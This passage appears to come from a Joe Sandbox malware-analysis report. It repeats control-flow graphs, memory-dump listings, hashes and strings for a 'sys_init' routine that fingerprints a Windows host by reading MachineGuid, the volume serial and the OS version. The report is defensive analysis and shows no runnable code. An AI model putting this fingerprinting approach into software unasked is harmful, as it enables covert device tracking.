                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                                    • API String ID: 3828489143-883582248
                                                                    • Opcode ID: 51a51f11c0d5ecfdc629bd7f59c270cc0ff0045a96e4eafe8e70bee8bd30c64d
                                                                    • Instruction ID: 615ac9e978d44e7cddc3924ad36d4f366b09c090dcb078acdf02754ef02b98b4
                                                                    • Opcode Fuzzy Hash: 51a51f11c0d5ecfdc629bd7f59c270cc0ff0045a96e4eafe8e70bee8bd30c64d
                                                                    • Instruction Fuzzy Hash: 3AD18B21E0CE57CDFA208B17E4403BD6660AF60778F1540F2D96EB76B6CE6DE8448749

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 407 7ffe0eb4e870-7ffe0eb4e88a call 7ffe0eb41aa4 410 7ffe0eb4eda2 407->410 411 7ffe0eb4e890-7ffe0eb4e8a5 call 7ffe0eb41a23 407->411 414 7ffe0eb4edb6-7ffe0eb4edbb 410->414 415 7ffe0eb4e8fb 411->415 416 7ffe0eb4e8a7-7ffe0eb4e8d5 411->416 417 7ffe0eb4e90d-7ffe0eb4e924 call 7ffe0eb41292 414->417 418 7ffe0eb4e900-7ffe0eb4e90b FreeLibrary 415->418 423 7ffe0eb4e8de-7ffe0eb4e8f9 call 7ffe0eb41292 416->423 424 7ffe0eb4e8d7-7ffe0eb4e8dc 416->424 422 7ffe0eb4e929-7ffe0eb4e936 417->422 418->417 421 7ffe0eb4e937-7ffe0eb4e970 GetNativeSystemInfo GetWindowsDirectoryA 418->421 425 7ffe0eb4ea4e-7ffe0eb4ea71 call 7ffe0eb41292 421->425 426 7ffe0eb4e976-7ffe0eb4e997 GetLastError call 7ffe0eb41292 421->426 423->418 424->418 425->417 435 7ffe0eb4ea77-7ffe0eb4eaad call 7ffe0eb42472 425->435 433 7ffe0eb4e9b7-7ffe0eb4e9bd 426->433 434 7ffe0eb4e999 426->434 433->414 439 7ffe0eb4e9c3-7ffe0eb4e9c9 433->439 436 7ffe0eb4e99b-7ffe0eb4e9a8 434->436 437 7ffe0eb4e9ad-7ffe0eb4e9b2 434->437 443 7ffe0eb4eab3-7ffe0eb4eab5 435->443 444 7ffe0eb4eb5e-7ffe0eb4eb7a call 7ffe0eb41292 435->444 436->437 437->417 441 7ffe0eb4ea02-7ffe0eb4ea08 439->441 442 7ffe0eb4e9cb-7ffe0eb4e9ce 439->442 447 7ffe0eb4edde-7ffe0eb4ede3 441->447 448 7ffe0eb4ea0e-7ffe0eb4ea14 441->448 445 7ffe0eb4e9d0-7ffe0eb4e9d3 442->445 446 7ffe0eb4e9ec-7ffe0eb4e9f2 442->446 443->417 452 7ffe0eb4eabb-7ffe0eb4eb18 GetVolumeInformationA 443->452 459 7ffe0eb4eb7f 444->459 453 7ffe0eb4edc0-7ffe0eb4edc5 445->453 454 7ffe0eb4e9d9-7ffe0eb4e9dc 445->454 455 7ffe0eb4edd4-7ffe0eb4edd9 446->455 456 7ffe0eb4e9f8-7ffe0eb4e9fd 446->456 447->417 449 7ffe0eb4ea1a-7ffe0eb4ea20 448->449 450 7ffe0eb4ede8-7ffe0eb4eded 448->450 457 7ffe0eb4edf2-7ffe0eb4edf7 449->457 458 7ffe0eb4ea26-7ffe0eb4ea2b 449->458 450->417 460 7ffe0eb4eb1e-7ffe0eb4eb44 GetLastError call 7ffe0eb41292 452->460 461 7ffe0eb4ec1b-7ffe0eb4ec4d call 7ffe0eb41292 452->461 453->417 462 7ffe0eb4e9e2-7ffe0eb4e9e7 454->462 463 7ffe0eb4edca-7ffe0eb4edcf 454->463 455->417 456->417 457->417 458->417 459->443 470 7ffe0eb4eb84-7ffe0eb4eb8a 460->470 471 7ffe0eb4eb46 460->471 468 7ffe0eb4ec4f-7ffe0eb4ec5b strlen 461->468 469 7ffe0eb4ec61-7ffe0eb4ec68 461->469 462->417 463->417 468->469 472 7ffe0eb4ed23-7ffe0eb4ed27 468->472 475 7ffe0eb4ec6c-7ffe0eb4ecc9 call 7ffe0eb41292 469->475 473 7ffe0eb4eb90 470->473 474 7ffe0eb4ece7-7ffe0eb4ecec 470->474 476 7ffe0eb4ecd3-7ffe0eb4ecd8 471->476 477 7ffe0eb4eb4c-7ffe0eb4eb59 471->477 472->469 478 7ffe0eb4ed2d-7ffe0eb4ed31 472->478 479 7ffe0eb4eb92-7ffe0eb4eb95 473->479 480 7ffe0eb4ebc9-7ffe0eb4ebcf 473->480 474->417 485 7ffe0eb4ecce 475->485 476->417 477->444 478->469 482 7ffe0eb4ed37-7ffe0eb4ed6a _errno call 7ffe0eb546f0 _errno 478->482 483 7ffe0eb4ebb3-7ffe0eb4ebb9 479->483 484 7ffe0eb4eb97-7ffe0eb4eb9a 479->484 486 7ffe0eb4ebd5-7ffe0eb4ebdb 480->486 487 7ffe0eb4ed0f-7ffe0eb4ed14 480->487 500 7ffe0eb4ed7a-7ffe0eb4ed9d _errno call 7ffe0eb41292 482->500 501 7ffe0eb4ed6c-7ffe0eb4ed6f 482->501 491 7ffe0eb4ed05-7ffe0eb4ed0a 483->491 492 7ffe0eb4ebbf-7ffe0eb4ebc4 483->492 489 7ffe0eb4eba0-7ffe0eb4eba3 484->489 490 7ffe0eb4ecf1-7ffe0eb4ecf6 484->490 485->422 493 7ffe0eb4ebe1-7ffe0eb4ebe7 486->493 494 7ffe0eb4ed19-7ffe0eb4ed1e 486->494 487->417 496 7ffe0eb4ecfb-7ffe0eb4ed00 489->496 497 7ffe0eb4eba9-7ffe0eb4ebae 489->497 490->417 491->417 492->417 498 7ffe0eb4ebf3-7ffe0eb4ebf8 493->498 499 7ffe0eb4ebe9-7ffe0eb4ebee 493->499 494->417 496->417 497->417 498->417 499->417 500->469 501->475 502 7ffe0eb4ed75 501->502 502->469
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                                    • API String ID: 3828489143-883582248
                                                                    • Opcode ID: 96c4144347eaacfba529ba0dd60b090915f6f582e2fbccf7b7be5ef0001ffb79
                                                                    • Instruction ID: 2daa8c33c53abfb9cf2336bf25d7de92785300d82188a89b5bacee11b40c1ee2
                                                                    • Opcode Fuzzy Hash: 96c4144347eaacfba529ba0dd60b090915f6f582e2fbccf7b7be5ef0001ffb79
                                                                    • Instruction Fuzzy Hash: DED15CA2E0CB5782FA709F19A8843B966A1FF44754F594132C9CE5B2F1DE2CE884CF41

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 505 7ffe0ebd3420-7ffe0ebd343a call 7ffe0ebd9ff4 508 7ffe0ebd3952 505->508 509 7ffe0ebd3440-7ffe0ebd3455 call 7ffe0ebd9f73 505->509 512 7ffe0ebd3966-7ffe0ebd396b 508->512 514 7ffe0ebd34ab 509->514 515 7ffe0ebd3457-7ffe0ebd3485 509->515 513 7ffe0ebd34bd-7ffe0ebd34d4 call 7ffe0ebd1292 512->513 518 7ffe0ebd34d9-7ffe0ebd34e6 513->518 517 7ffe0ebd34b0-7ffe0ebd34bb FreeLibrary 514->517 523 7ffe0ebd3487-7ffe0ebd348c 515->523 524 7ffe0ebd348e-7ffe0ebd34a9 call 7ffe0ebd1292 515->524 517->513 520 7ffe0ebd34e7-7ffe0ebd3520 GetNativeSystemInfo GetWindowsDirectoryA 517->520 521 7ffe0ebd3526-7ffe0ebd3547 GetLastError call 7ffe0ebd1292 520->521 522 7ffe0ebd35fe-7ffe0ebd3621 call 7ffe0ebd1292 520->522 531 7ffe0ebd3567-7ffe0ebd356d 521->531 532 7ffe0ebd3549 521->532 522->513 533 7ffe0ebd3627-7ffe0ebd365d call 7ffe0ebd8702 522->533 523->517 524->517 531->512 537 7ffe0ebd3573-7ffe0ebd3579 531->537 534 7ffe0ebd354b-7ffe0ebd3558 532->534 535 7ffe0ebd355d-7ffe0ebd3562 532->535 543 7ffe0ebd3663-7ffe0ebd3665 533->543 544 7ffe0ebd370e-7ffe0ebd372a call 7ffe0ebd1292 533->544 534->535 535->513 539 7ffe0ebd357b-7ffe0ebd357e 537->539 540 7ffe0ebd35b2-7ffe0ebd35b8 537->540 545 7ffe0ebd359c-7ffe0ebd35a2 539->545 546 7ffe0ebd3580-7ffe0ebd3583 539->546 541 7ffe0ebd398e-7ffe0ebd3993 540->541 542 7ffe0ebd35be-7ffe0ebd35c4 540->542 541->513 549 7ffe0ebd35ca-7ffe0ebd35d0 542->549 550 7ffe0ebd3998-7ffe0ebd399d 542->550 543->513 552 7ffe0ebd366b-7ffe0ebd36c8 GetVolumeInformationA 543->552 557 7ffe0ebd372f 544->557 547 7ffe0ebd35a8-7ffe0ebd35ad 545->547 548 7ffe0ebd3984-7ffe0ebd3989 545->548 553 7ffe0ebd3589-7ffe0ebd358c 546->553 554 7ffe0ebd3970-7ffe0ebd3975 546->554 547->513 548->513 555 7ffe0ebd35d6-7ffe0ebd35db 549->555 556 7ffe0ebd39a2-7ffe0ebd39a7 549->556 550->513 558 7ffe0ebd37cb-7ffe0ebd37fd call 7ffe0ebd1292 552->558 559 7ffe0ebd36ce-7ffe0ebd36f4 GetLastError call 7ffe0ebd1292 552->559 560 7ffe0ebd397a-7ffe0ebd397f 553->560 561 7ffe0ebd3592-7ffe0ebd3597 553->561 554->513 555->513 556->513 557->543 568 7ffe0ebd37ff-7ffe0ebd380b strlen 558->568 569 7ffe0ebd3811-7ffe0ebd3818 558->569 566 7ffe0ebd36f6 559->566 567 7ffe0ebd3734-7ffe0ebd373a 559->567 560->513 561->513 570 7ffe0ebd36fc-7ffe0ebd3709 566->570 571 7ffe0ebd3883-7ffe0ebd3888 566->571 572 7ffe0ebd3897-7ffe0ebd389c 567->572 573 7ffe0ebd3740 567->573 568->569 574 7ffe0ebd38d3-7ffe0ebd38d7 568->574 575 7ffe0ebd381c-7ffe0ebd3879 call 7ffe0ebd1292 569->575 570->544 571->513 572->513 577 7ffe0ebd3779-7ffe0ebd377f 573->577 578 7ffe0ebd3742-7ffe0ebd3745 573->578 574->569 576 7ffe0ebd38dd-7ffe0ebd38e1 574->576 585 7ffe0ebd387e 575->585 576->569 582 7ffe0ebd38e7-7ffe0ebd391a _errno call 7ffe0ebe1118 _errno 576->582 580 7ffe0ebd3785-7ffe0ebd378b 577->580 581 7ffe0ebd38bf-7ffe0ebd38c4 577->581 583 7ffe0ebd3747-7ffe0ebd374a 578->583 584 7ffe0ebd3763-7ffe0ebd3769 578->584 586 7ffe0ebd38c9-7ffe0ebd38ce 580->586 587 7ffe0ebd3791-7ffe0ebd3797 580->587 581->513 598 7ffe0ebd392a-7ffe0ebd394d _errno call 7ffe0ebd1292 582->598 599 7ffe0ebd391c-7ffe0ebd391f 582->599 589 7ffe0ebd3750-7ffe0ebd3753 583->589 590 7ffe0ebd38a1-7ffe0ebd38a6 583->590 591 7ffe0ebd38b5-7ffe0ebd38ba 584->591 592 7ffe0ebd376f-7ffe0ebd3774 584->592 585->518 586->513 593 7ffe0ebd3799-7ffe0ebd379e 587->593 594 7ffe0ebd37a3-7ffe0ebd37a8 587->594 596 7ffe0ebd38ab-7ffe0ebd38b0 589->596 597 7ffe0ebd3759-7ffe0ebd375e 589->597 590->513 591->513 592->513 593->513 594->513 596->513 597->513 598->569 599->575 600 7ffe0ebd3925 599->600 600->569
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                                    • API String ID: 3828489143-883582248
                                                                    • Opcode ID: 43bcd0575c0f7ec6056dd52dc064e9ae3c34a18d5cafb5303807578d007f6b06
                                                                    • Instruction ID: 0af10df0c60e3f7d618654f277240a6e2a36bea0c7ce0779b12149e827fdb83c
                                                                    • Opcode Fuzzy Hash: 43bcd0575c0f7ec6056dd52dc064e9ae3c34a18d5cafb5303807578d007f6b06
                                                                    • Instruction Fuzzy Hash: F4D14722E0D65282FB328F54E4403F967A0AF41B54F154172C9DE573BAEE6DED848F82

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 603 7ffe0ec04430-7ffe0ec0444a call 7ffe0ec02174 606 7ffe0ec04962 603->606 607 7ffe0ec04450-7ffe0ec04465 call 7ffe0ec020f3 603->607 610 7ffe0ec04976-7ffe0ec0497b 606->610 611 7ffe0ec044bb 607->611 612 7ffe0ec04467-7ffe0ec04495 607->612 613 7ffe0ec044cd-7ffe0ec044e4 call 7ffe0ec02fd2 610->613 614 7ffe0ec044c0-7ffe0ec044cb FreeLibrary 611->614 619 7ffe0ec04497-7ffe0ec0449c 612->619 620 7ffe0ec0449e-7ffe0ec044b9 call 7ffe0ec02fd2 612->620 618 7ffe0ec044e9-7ffe0ec044f6 613->618 614->613 617 7ffe0ec044f7-7ffe0ec04530 GetNativeSystemInfo GetWindowsDirectoryA 614->617 621 7ffe0ec04536-7ffe0ec04557 GetLastError call 7ffe0ec02fd2 617->621 622 7ffe0ec0460e-7ffe0ec04631 call 7ffe0ec02fd2 617->622 619->614 620->614 629 7ffe0ec04559 621->629 630 7ffe0ec04577-7ffe0ec0457d 621->630 622->613 631 7ffe0ec04637-7ffe0ec0466d call 7ffe0ec09702 622->631 632 7ffe0ec0456d-7ffe0ec04572 629->632 633 7ffe0ec0455b-7ffe0ec04568 629->633 630->610 635 7ffe0ec04583-7ffe0ec04589 630->635 639 7ffe0ec04673-7ffe0ec04675 631->639 640 7ffe0ec0471e-7ffe0ec0473a call 7ffe0ec02fd2 631->640 632->613 633->632 637 7ffe0ec0458b-7ffe0ec0458e 635->637 638 7ffe0ec045c2-7ffe0ec045c8 635->638 641 7ffe0ec045ac-7ffe0ec045b2 637->641 642 7ffe0ec04590-7ffe0ec04593 637->642 643 7ffe0ec0499e-7ffe0ec049a3 638->643 644 7ffe0ec045ce-7ffe0ec045d4 638->644 639->613 646 7ffe0ec0467b-7ffe0ec046d8 GetVolumeInformationA 639->646 655 7ffe0ec0473f 640->655 649 7ffe0ec045b8-7ffe0ec045bd 641->649 650 7ffe0ec04994-7ffe0ec04999 641->650 647 7ffe0ec04599-7ffe0ec0459c 642->647 648 7ffe0ec04980-7ffe0ec04985 642->648 643->613 651 7ffe0ec045da-7ffe0ec045e0 644->651 652 7ffe0ec049a8-7ffe0ec049ad 644->652 656 7ffe0ec047db-7ffe0ec0480d call 7ffe0ec02fd2 646->656 657 7ffe0ec046de-7ffe0ec04704 GetLastError call 7ffe0ec02fd2 646->657 658 7ffe0ec0498a-7ffe0ec0498f 647->658 659 7ffe0ec045a2-7ffe0ec045a7 647->659 648->613 649->613 650->613 653 7ffe0ec045e6-7ffe0ec045eb 651->653 654 7ffe0ec049b2-7ffe0ec049b7 651->654 652->613 653->613 654->613 655->639 664 7ffe0ec04821-7ffe0ec04828 656->664 665 7ffe0ec0480f-7ffe0ec0481b strlen 656->665 666 7ffe0ec04706 657->666 667 7ffe0ec04744-7ffe0ec0474a 657->667 658->613 659->613 671 7ffe0ec0482c-7ffe0ec04889 call 7ffe0ec02fd2 664->671 665->664 668 7ffe0ec048e3-7ffe0ec048e7 665->668 672 7ffe0ec0470c-7ffe0ec04719 666->672 673 7ffe0ec04893-7ffe0ec04898 666->673 669 7ffe0ec048a7-7ffe0ec048ac 667->669 670 7ffe0ec04750 667->670 668->664 677 7ffe0ec048ed-7ffe0ec048f1 668->677 669->613 674 7ffe0ec04789-7ffe0ec0478f 670->674 675 7ffe0ec04752-7ffe0ec04755 670->675 681 7ffe0ec0488e 671->681 672->640 673->613 682 7ffe0ec04795-7ffe0ec0479b 674->682 683 7ffe0ec048cf-7ffe0ec048d4 674->683 679 7ffe0ec04757-7ffe0ec0475a 675->679 680 7ffe0ec04773-7ffe0ec04779 675->680 677->664 678 7ffe0ec048f7-7ffe0ec0492a _errno call 7ffe0ec10c38 _errno 677->678 696 7ffe0ec0492c-7ffe0ec0492f 678->696 697 7ffe0ec0493a-7ffe0ec0495d _errno call 7ffe0ec02fd2 678->697 685 7ffe0ec048b1-7ffe0ec048b6 679->685 686 7ffe0ec04760-7ffe0ec04763 679->686 687 7ffe0ec048c5-7ffe0ec048ca 680->687 688 7ffe0ec0477f-7ffe0ec04784 680->688 681->618 689 7ffe0ec048d9-7ffe0ec048de 682->689 690 7ffe0ec047a1-7ffe0ec047a7 682->690 683->613 685->613 692 7ffe0ec048bb-7ffe0ec048c0 686->692 693 7ffe0ec04769-7ffe0ec0476e 686->693 687->613 688->613 689->613 694 7ffe0ec047a9-7ffe0ec047ae 690->694 695 7ffe0ec047b3-7ffe0ec047b8 690->695 692->613 693->613 694->613 695->613 696->671 698 7ffe0ec04935 696->698 697->664 698->664
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559811045.00007FFE0EC01000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE0EC00000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559796463.00007FFE0EC00000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559830630.00007FFE0EC12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559846613.00007FFE0EC1B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559867290.00007FFE0EC1E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559886112.00007FFE0EC1F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559905319.00007FFE0EC22000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe0ec00000_main.jbxd
                                                                    Similarity
                                                                    • API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
                                                                    • String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
                                                                    • API String ID: 3828489143-883582248
                                                                    • Opcode ID: 115724a50ad51f5d3a0dc080a03e658484dc1201f57563a707ab0e97b319153d
                                                                    • Instruction ID: d0ad5404ba2a4adfb2e5791e32cf1d4d3ba87d3a6c5ad1fdb3d4b059e442e62d
                                                                    • Opcode Fuzzy Hash: 115724a50ad51f5d3a0dc080a03e658484dc1201f57563a707ab0e97b319153d
                                                                    • Instruction Fuzzy Hash: 73D19162E0C6D2B1FB648794A4C03BA6251BF46798F550172CEDD472B1DE2FEC448783

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 309 7ffe0e169770-7ffe0e16978a call 7ffe0e16cf94 312 7ffe0e169ca2 309->312 313 7ffe0e169790-7ffe0e1697a5 call 7ffe0e16cf13 309->313 315 7ffe0e169cb6-7ffe0e169cbb 312->315 318 7ffe0e1697fb 313->318 319 7ffe0e1697a7-7ffe0e1697d5 313->319 317 7ffe0e16980d-7ffe0e169824 call 7ffe0e161292 315->317 323 7ffe0e169829-7ffe0e169836 317->323 320 7ffe0e169800-7ffe0e16980b FreeLibrary 318->320 327 7ffe0e1697de-7ffe0e1697f9 call 7ffe0e161292 319->327 328 7ffe0e1697d7-7ffe0e1697dc 319->328 320->317 322 7ffe0e169837-7ffe0e169870 GetNativeSystemInfo GetWindowsDirectoryA 320->322 325 7ffe0e16994e-7ffe0e169971 call 7ffe0e161292 322->325 326 7ffe0e169876-7ffe0e169897 GetLastError call 7ffe0e161292 322->326 325->317 337 7ffe0e169977-7ffe0e1699ad call 7ffe0e16b0e2 325->337 335 7ffe0e169899 326->335 336 7ffe0e1698b7-7ffe0e1698bd 326->336 327->320 328->320 338 7ffe0e1698ad-7ffe0e1698b2 335->338 339 7ffe0e16989b-7ffe0e1698a8 335->339 336->315 341 7ffe0e1698c3-7ffe0e1698c9 336->341 349 7ffe0e1699b3-7ffe0e1699b5 337->349 350 7ffe0e169a5e-7ffe0e169a7a call 7ffe0e161292 337->350 338->317 339->338 343 7ffe0e169902-7ffe0e169908 341->343 344 7ffe0e1698cb-7ffe0e1698ce 341->344 347 7ffe0e169cde-7ffe0e169ce3 343->347 348 7ffe0e16990e-7ffe0e169914 343->348 345 7ffe0e1698d0-7ffe0e1698d3 344->345 346 7ffe0e1698ec-7ffe0e1698f2 344->346 352 7ffe0e169cc0-7ffe0e169cc5 345->352 353 7ffe0e1698d9-7ffe0e1698dc 345->353 354 7ffe0e169cd4-7ffe0e169cd9 346->354 355 7ffe0e1698f8-7ffe0e1698fd 346->355 347->317 356 7ffe0e16991a-7ffe0e169920 348->356 357 7ffe0e169ce8-7ffe0e169ced 348->357 349->317 351 7ffe0e1699bb-7ffe0e169a18 GetVolumeInformationA 349->351 365 7ffe0e169a7f 350->365 359 7ffe0e169a1e-7ffe0e169a44 GetLastError call 7ffe0e161292 351->359 360 7ffe0e169b1b-7ffe0e169b4d call 7ffe0e161292 351->360 352->317 361 7ffe0e1698e2-7ffe0e1698e7 353->361 362 7ffe0e169cca-7ffe0e169ccf 353->362 354->317 355->317 363 7ffe0e169cf2-7ffe0e169cf7 356->363 364 7ffe0e169926-7ffe0e16992b 356->364 357->317 370 7ffe0e169a84-7ffe0e169a8a 359->370 371 7ffe0e169a46 359->371 372 7ffe0e169b61-7ffe0e169b68 360->372 373 7ffe0e169b4f-7ffe0e169b5b strlen 360->373 361->317 362->317 363->317 364->317 365->349 376 7ffe0e169a90 370->376 377 7ffe0e169be7-7ffe0e169bec 370->377 374 7ffe0e169bd3-7ffe0e169bd8 371->374 375 7ffe0e169a4c-7ffe0e169a59 371->375 379 7ffe0e169b6c-7ffe0e169bc9 call 7ffe0e161292 372->379 373->372 378 7ffe0e169c23-7ffe0e169c27 373->378 374->317 375->350 381 7ffe0e169a92-7ffe0e169a95 376->381 382 7ffe0e169ac9-7ffe0e169acf 376->382 377->317 378->372 380 7ffe0e169c2d-7ffe0e169c31 378->380 389 7ffe0e169bce 379->389 380->372 386 7ffe0e169c37-7ffe0e169c6a _errno call 7ffe0e172ab8 _errno 380->386 387 7ffe0e169ab3-7ffe0e169ab9 381->387 388 7ffe0e169a97-7ffe0e169a9a 381->388 384 7ffe0e169ad5-7ffe0e169adb 382->384 385 7ffe0e169c0f-7ffe0e169c14 382->385 392 7ffe0e169ae1-7ffe0e169ae7 384->392 393 7ffe0e169c19-7ffe0e169c1e 384->393 385->317 402 7ffe0e169c6c-7ffe0e169c6f 386->402 403 7ffe0e169c7a-7ffe0e169c9d _errno call 7ffe0e161292 386->403 390 7ffe0e169c05-7ffe0e169c0a 387->390 391 7ffe0e169abf-7ffe0e169ac4 387->391 395 7ffe0e169aa0-7ffe0e169aa3 388->395 396 7ffe0e169bf1-7ffe0e169bf6 388->396 389->323 390->317 391->317 397 7ffe0e169af3-7ffe0e169af8 392->397 398 7ffe0e169ae9-7ffe0e169aee 392->398 393->317 400 7ffe0e169bfb-7ffe0e169c00 395->400 401 7ffe0e169aa9-7ffe0e169aae 395->401 396->317 397->317 398->317 400->317 401->317 402->379 404 7ffe0e169c75 402->404 403->372 404->372
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
